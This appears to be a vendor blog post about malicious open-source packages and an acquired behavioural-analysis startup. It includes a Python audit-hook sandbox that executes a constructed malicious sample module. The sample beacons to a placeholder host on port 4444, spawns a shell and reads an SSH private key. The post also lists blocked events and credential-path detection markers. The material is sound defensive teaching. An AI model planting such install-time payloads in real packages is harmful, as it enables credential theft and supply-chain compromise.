What’s Lurking Within: Stopping Malicious Actors in Software Supply Chains

What’s Lurking Within? Malicious Code.

Supply chain attacks occur when threat actors insert malicious code into trusted software, creating a vector to compromise the data or systems that trust it. To avoid becoming the victim, or the unwilling accomplice, of a software supply chain attack, you need to carefully assess the software components used in your applications. One common way of sneaking bad code into good applications is to compromise or impersonate an open source library. Modern development practices rely heavily on importing reusable components, which is why there is a healthy population of Software Composition Analysis (SCA) tools designed to flag problematic packages during development.

Much of the effort to secure open source components has focused on finding vulnerabilities: flaws in the code that attackers can exploit, but that were introduced by mistake rather than by design. Existing application security testing tools, such as static or interactive code analysis, can find this kind of flaw.

Hidden among the masses of Node.js packages, Python modules and .NET NuGet packages, however, are a significant number of libraries that are securely coded and elegantly implemented, yet deeply malicious at the same time. A vulnerability scanner will not flag a package that does exactly what its author intended, so defending against these attacks demands a different set of capabilities.

That’s why we’re proud to share that Checkmarx has acquired Dustico, an innovative startup that has developed unique methods to identify supply chain attacks.

When code has been written to deliberately hide its intent, it’s important to evaluate what the code does when you run it, and who created it in the first place. As Tzachi Zornstain, one of Dustico’s founders, says: “Don’t take code from strangers.”

What a piece of software does when it runs, which processes it spawns, which ports it opens and which network connections it attempts are all critical indicators of the package's intent.
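The run-time evidence described above can be collected cheaply inside the interpreter using CPython's audit hooks (Python 3.8 or newer). The script below is an added example written for this post, not Checkmarx or Dustico code. It executes a constructed sample module the way an import would, records every attempt to connect out, spawn a process or read a credential file, and denies each attempt before it takes effect, so it runs offline. The beacon address 203.0.113.10:4444 and the sensitive-path list are assumptions made for the demo.

```python
"""Record what a package does when it is imported, using CPython audit hooks.

Added example for this post, not Checkmarx or Dustico code. SUSPICIOUS_MODULE
is constructed for the demo: it imitates a typosquatted utility that phones
home, spawns a shell and reads an SSH key at import time. 203.0.113.10:4444 is
a TEST-NET placeholder (assumption); every action is denied before it happens.
"""
import os          # noqa: F401  pre-imported so the sandboxed 'import os' etc.
import socket      # noqa: F401  are served from sys.modules and open no files
import subprocess  # noqa: F401  while the hook is watching
import sys
from dataclasses import dataclass, field

# Audit events a utility library has no business raising at import time.
BLOCKED_EVENTS = {"socket.connect", "subprocess.Popen", "os.system",
                  "os.exec", "os.spawn", "os.posix_spawn", "os.fork"}
# Path fragments whose read at import time is an indicator on its own (assumption).
SENSITIVE_PATH_MARKERS = ("/etc/", ".ssh", ".aws", ".npmrc", ".pypirc")

# Constructed sample package: advertised function plus hidden install-time payload.
SUSPICIOUS_MODULE = r'''
import os, socket, subprocess

def slugify(text):            # the advertised functionality
    return text.lower().replace(" ", "-")

# Hidden behaviour, wrapped in try/except so a failed beacon never breaks the
# import and tips off the victim (typical of real malicious packages).
try:
    with socket.socket() as s:
        s.connect(("203.0.113.10", 4444))
except OSError:
    pass
try:
    subprocess.Popen(["sh", "-c", "id"])
except OSError:
    pass
try:
    open(os.path.expanduser("~/.ssh/id_rsa")).read()
except OSError:
    pass
'''


@dataclass
class Report:
    events: list = field(default_factory=list)  # (event name, detail) in order seen
    blocked: int = 0

    def indicators(self):
        """Distinct behaviours observed, suitable as features for a risk model."""
        return sorted({name for name, _ in self.events})


_current = None          # Report being filled while run_untrusted() executes
_hook_installed = False  # audit hooks cannot be removed, so install exactly once


def _audit_hook(event, args):
    report = _current
    if report is None:
        return  # not inside run_untrusted(): stay out of the host's way
    if event in BLOCKED_EVENTS:
        # socket.connect passes (sock, address); Popen passes (executable, argv, cwd, env)
        detail = args[1] if event in ("socket.connect", "subprocess.Popen") else args[0]
        report.events.append((event, repr(detail)))
        report.blocked += 1
        raise PermissionError(f"sandbox: {event} denied")
    if event == "open":
        path = str(args[0])
        if any(marker in path for marker in SENSITIVE_PATH_MARKERS):
            report.events.append(("open", path))
            report.blocked += 1
            raise PermissionError(f"sandbox: open({path!r}) denied")


def run_untrusted(source, name="<untrusted>"):
    """Execute module source as an import would, recording and denying risky actions."""
    global _current, _hook_installed
    if not _hook_installed:
        sys.addaudithook(_audit_hook)
        _hook_installed = True
    code = compile(source, name, "exec")
    report = Report()
    _current = report
    try:
        exec(code, {"__name__": name})
    except Exception as exc:
        # A module that does not swallow the denial dies here; the trace survives.
        report.events.append(("aborted", f"{type(exc).__name__}: {exc}"))
    finally:
        _current = None
    return report


if __name__ == "__main__":
    r = run_untrusted(SUSPICIOUS_MODULE)
    for name, detail in r.events:
        print(f"{name:18} {detail}")
    print(f"blocked {r.blocked} action(s); indicators: {r.indicators()}")
```

Audit hooks are an observability feature, not a security boundary: native extensions, ctypes and ordinary file writes are not covered, and the untrusted code shares the interpreter with the analyzer. Treat the report as the list of behavioural indicators to feed into a risk model, and do the real execution only in the isolated, network-sinkholed environment this post goes on to describe. The indicators are also not verdicts: a library that legitimately opens a socket at import time trips the same check, which is why contributor reputation is weighed alongside behaviour.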

Looking at who contributed the code, what other packages they have published, and their overall online presence gives further indicators of the likely intent behind their coding activity. This information is rarely definitive on its own, but it is a useful component of a risk model.

Of course, doing this for the hundreds of packages and contributors in your supply chain is unsustainable. Just building the technology to safely test new packages in a protected, blast-proof environment is a significant task, never mind building the tools to evaluate the results. In addition, creating your own analysis of the thousands of open source contributors is impractical.

That’s why we will be rolling the innovative technology we’ve acquired into our software composition analysis tool, CxSCA. Now, alongside our curated threat feed, independent security research, and market leading capabilities like Exploitable Path, we will be adding ML-driven behavioral analysis and contributor reputation indicators into the risk analysis equation.

If you’re concerned about attackers sliding into your supply chain, then be glad that we’re working hard to get these new protections into CxSCA as fast as possible, and keep an eye out for some really interesting research we plan to publish here soon.
